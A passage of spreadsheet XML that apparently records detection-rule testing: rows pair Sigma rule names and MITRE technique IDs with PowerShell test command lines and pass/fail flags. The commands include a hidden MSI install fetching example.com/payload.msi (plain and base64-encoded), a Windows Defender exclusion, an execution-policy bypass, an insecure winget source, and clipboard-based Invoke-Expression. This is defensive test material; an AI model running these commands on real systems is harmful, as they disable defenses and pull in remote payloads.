          <t>powershell.exe -"Command" "$a = 'j'; $b = 'o'; $c = 'i'; $d = 'n'; $e = 's'; $f = 'p'; $g = 'l'; $h = 'i'; $i = 't'; $cmd = $a+$b+$c+$d+' '+$e+$f+$g+$h+$i; Invoke-Expression ('Write-Host ' + $cmd)"</t>
        </is>
      </c>
      <c r="F3089" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3089" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3089" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3089" s="43" t="n"/>
      <c r="J3089" s="43" t="n"/>
      <c r="K3089" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3090" ht="15.75" customHeight="1" s="42">
      <c r="A3090" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B3090" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3090" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3090" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3090" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JAB1AD0AJwBoAHQAcABzADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvACcAOwAkAGkAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAoACcAaQBuAGQAbwB3AHMASQBuAHMAdABhAGwAbABlAHIALgBJAG4AcwB0AGEAbABsAGUAcgAnAC4ASQBuAHMAZQByAHQAKAAwACwAJwBXACcAKQApADsAJABpAC4AVQBJAEwAZQB2AGUAbAA9ADIAOwAkAGkALgBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKAAkACgAaQBmACgAJAB1AC4AUwB0AGEAcgB0AHMAVwBpAHQAaAAoACcAaAB0AHAAcwA6AC8ALwAnACkAKQB7ACQAdQAuAEkAbgBzAGUAcgB0ACgAMgAsACcAdAAnACkAfQBlAGwAcwBlAHsAJAB1AH0AKQAsACcAJwApADsA</t>
        </is>
      </c>
      <c r="F3090" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3090" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3090" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3090" s="43" t="n"/>
      <c r="J3090" s="43" t="n"/>
      <c r="K3090" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3091" ht="15.75" customHeight="1" s="42">
      <c r="A3091" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B3091" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3091" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3091" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3091" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"w" hidden -c "$type=[type]::GetTypeFromProgID('WindowsInstaller.Installer'); $inst=[Activator]::CreateInstance($type); $inst.UILevel=2; $inst.InstallProduct('https://example.com/payload.msi', '')"</t>
        </is>
      </c>
      <c r="F3091" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3091" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3091" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3091" s="43" t="n"/>
      <c r="J3091" s="43" t="n"/>
      <c r="K3091" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3092" ht="15.75" customHeight="1" s="42">
      <c r="A3092" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B3092" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3092" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3092" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3092" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w hidden /"c" "$type=[type]::GetTypeFromProgID('WindowsInstaller.Installer'); $inst=[Activator]::CreateInstance($type); $inst.UILevel=2; $inst.InstallProduct('https://example.com/payload.msi', '')"</t>
        </is>
      </c>
      <c r="F3092" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3092" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3092" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3092" s="43" t="n"/>
      <c r="J3092" s="43" t="n"/>
      <c r="K3092" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3093" ht="15.75" customHeight="1" s="42">
      <c r="A3093" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3093" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3093" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3093" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3093" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3093" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3093" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3093" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3093" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3093" s="43" t="n"/>
      <c r="K3093" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3094" ht="15.75" customHeight="1" s="42">
      <c r="A3094" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3094" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C3094" s="43" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D3094" s="43" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E3094" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F3094" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3094" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3094" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3094" s="43" t="n"/>
      <c r="J3094" s="43" t="n"/>
      <c r="K3094" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3095" ht="15.75" customHeight="1" s="42">
      <c r="A3095" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3095" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C3095" s="43" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D3095" s="43" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E3095" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F3095" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3095" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3095" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3095" s="43" t="n"/>
      <c r="J3095" s="43" t="n"/>
      <c r="K3095" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3096" ht="15.75" customHeight="1" s="42">
      <c r="A3096" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3096" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3096" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3096" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3096" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3096" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3096" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3096" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3096" s="43" t="n"/>
      <c r="J3096" s="43" t="n"/>
      <c r="K3096" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3097" ht="15.75" customHeight="1" s="42">
      <c r="A3097" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3097" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3097" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3097" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3097" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3097" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3097" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3097" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3097" s="43" t="n"/>
      <c r="J3097" s="43" t="n"/>
      <c r="K3097" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3098" ht="15.75" customHeight="1" s="42">
      <c r="A3098" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3098" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3098" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3098" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3098" s="43" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3098" s="43" t="n"/>
      <c r="J3098" s="43" t="n"/>
      <c r="K3098" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3099" ht="15.75" customHeight="1" s="42">
      <c r="A3099" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3099" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3099" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3099" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3099" s="43" t="inlineStr">
        <is>
          <t>powershell /"nop" -"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3099" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3099" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3099" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3099" s="43" t="n"/>
      <c r="J3099" s="43" t="n"/>
      <c r="K3099" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3100" ht="15.75" customHeight="1" s="42">
      <c r="A3100" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3100" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3100" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3100" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3100" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3100" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3100" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3100" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3100" s="43" t="n"/>
      <c r="J3100" s="43" t="n"/>
      <c r="K3100" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3101" ht="15.75" customHeight="1" s="42">
      <c r="A3101" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3101" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3101" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3101" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3101" s="43" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3101" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3101" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3101" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3101" s="43" t="n"/>
      <c r="J3101" s="43" t="n"/>
      <c r="K3101" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3102" ht="15.75" customHeight="1" s="42">
      <c r="A3102" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3102" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3102" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3102" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3102" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" /"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3102" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3102" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3102" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3102" s="43" t="n"/>
      <c r="J3102" s="43" t="n"/>
      <c r="K3102" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3103" ht="15.75" customHeight="1" s="42">
      <c r="A3103" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3103" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3103" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3103" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3103" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3103" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3103" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3103" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3103" s="43" t="n"/>
      <c r="J3103" s="43" t="n"/>
      <c r="K3103" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3104" ht="15.75" customHeight="1" s="42">
      <c r="A3104" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3104" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3104" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3104" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3104" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3104" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3104" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3104" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3104" s="43" t="n"/>
      <c r="J3104" s="43" t="n"/>
      <c r="K3104" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3105" ht="15.75" customHeight="1" s="42">
      <c r="A3105" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3105" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C3105" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D3105" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E3105" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F3105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3105" s="43" t="n"/>
      <c r="J3105" s="43" t="n"/>
      <c r="K3105" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3106" ht="15.75" customHeight="1" s="42">
      <c r="A3106" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3106" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C3106" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D3106" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E3106" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-N' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F3106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3106" s="43" t="n"/>
      <c r="J3106" s="43" t="n"/>
      <c r="K3106" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3107" ht="15.75" customHeight="1" s="42">
      <c r="A3107" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3107" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C3107" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D3107" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E3107" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F3107" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3107" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3107" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3107" s="43" t="n"/>
      <c r="J3107" s="43" t="n"/>
      <c r="K3107" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3108" ht="15.75" customHeight="1" s="42">
      <c r="A3108" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3108" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C3108" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D3108" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E3108" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F3108" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3108" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3108" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3108" s="43" t="n"/>
      <c r="J3108" s="43" t="n"/>
      <c r="K3108" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3109" ht="15.75" customHeight="1" s="42">
      <c r="A3109" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3109" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C3109" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D3109" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E3109" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F3109" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3109" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3109" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3109" s="43" t="n"/>
      <c r="J3109" s="43" t="n"/>
      <c r="K3109" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3110" ht="15.75" customHeight="1" s="42">
      <c r="A3110" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3110" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3110" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3110" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3110" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F3110" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3110" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3110" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3110" s="43" t="n"/>
      <c r="J3110" s="43" t="n"/>
      <c r="K3110" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3111" ht="15.75" customHeight="1" s="42">
      <c r="A3111" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3111" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3111" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3111" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3111" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F3111" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3111" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3111" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3111" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J3111" s="43" t="n"/>
      <c r="K3111" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3112" ht="15.75" customHeight="1" s="42">
      <c r="A3112" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3112" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3112" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3112" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3112" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -c "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F3112" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3112" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3112" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3112" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J3112" s="43" t="n"/>
      <c r="K3112" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3113" ht="15.75" customHeight="1" s="42">
      <c r="A3113" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3113" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3113" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3113" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3113" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F3113" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3113" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3113" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3113" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J3113" s="43" t="n"/>
      <c r="K3113" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3114" ht="15.75" customHeight="1" s="42">
      <c r="A3114" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3114" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C3114" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
